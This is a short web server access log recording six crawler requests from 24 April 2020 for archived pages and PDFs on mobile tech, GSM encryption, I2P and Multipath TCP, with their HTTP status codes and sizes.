5.9.32.222 - - [24/Apr/2020:11:14:55 -0400] "GET /depository//////////mobile/Mobile%20World%20Congress%202015%20%20%D1%81%D0%B0%D0%BC%D1%8B%D0%B5%20%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%B5%D1%81%D0%BD%D1%8B%D0%B5%20%D0%B3%D0%B0%D0%B4%D0%B6%D0%B5%D1%82%D1%8B%20%20%20%D0%A1%D0%BF%D0%B0%D1%81%D0%B0%D0%B5%D0%BC%20%D0%BC%D0%B8%D1%80%20%D1%81%D0%BB%D0%BE%D0%B2%D0%BE%D0%BC%20%20%20%D0%9E%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%80%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B1%D0%BB%D0%BE%D0%B3%20%D0%9B%D0%B0%D0%B1%D0%BE%D1%80%D0%B0%D1%82%D0%BE%D1%80%D0%B8%D0%B8%20%D0%9A%D0%B0%D1%81%D0%BF%D0%B5%D1%80%D1%81%D0%BA%D0%BE%D0%B3%D0%BE_files/Mobile%20World%20Congress%202015%20%20%D1%81%D0%B0%D0%BC%D1%8B%D0%B5%20%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%B5%D1%81%D0%BD%D1%8B%D0%B5%20%D0%B3%D0%B0%D0%B4%D0%B6%D0%B5%D1%82%D1%8B%20%20%20%D0%A1%D0%BF%D0%B0%D1%81%D0%B0%D0%B5%D0%BC%20%D0%BC%D0%B8%D1%80%20%D1%81%D0%BB%D0%BE%D0%B2%D0%BE%D0%BC%20%20%20%D0%9E%D1%84%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%80%D1%83%D1%81%D1%81%D0%BA%D HTTP/1.1" 400 226
5.9.32.222 - - [24/Apr/2020:11:14:58 -0400] "GET /depository//////////mobile/TechRepublic%20Defcon%20GSM%20encryption%20is%20vulnerable.files/themedata.thmx HTTP/1.1" 200 3112
213.180.203.118 - - [24/Apr/2020:11:15:02 -0400] "GET /depository/big_data/Big_data_analytics_CloudStack_top_hot_cloud_computing_trends_in_2013.mht HTTP/1.1" 200 794691
213.180.203.118 - - [24/Apr/2020:11:15:08 -0400] "GET /depository/i2p/Introducing_I2P_I2P.mht HTTP/1.1" 200 205424
93.115.26.54 - - [24/Apr/2020:11:15:18 -0400] "GET /depository/security/Revised_0309_ISM_TM_eG.pdf HTTP/1.1" 200 3184245
5.9.32.222 - - [24/Apr/2020:11:15:22 -0400] "GET /depository//////////mptcp/A%2050%20Gbps%20Connection%20With%20Multipath%20TCP%20-%20Slashdot_files/A%2050%20Gbps%20Connection%20With%20Multipath%20TCP%20-%20Slashdot.htm HTTP/1.1" 404 335
